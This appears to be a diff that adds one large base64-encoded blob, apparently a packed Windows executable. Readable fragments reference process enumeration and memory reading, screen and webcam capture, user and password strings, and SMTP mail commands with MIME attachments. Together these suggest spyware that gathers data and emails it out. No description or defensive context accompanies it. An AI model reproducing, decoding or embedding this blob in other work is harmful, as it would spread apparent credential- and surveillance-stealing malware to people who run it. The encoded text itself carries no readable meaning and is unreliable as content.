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
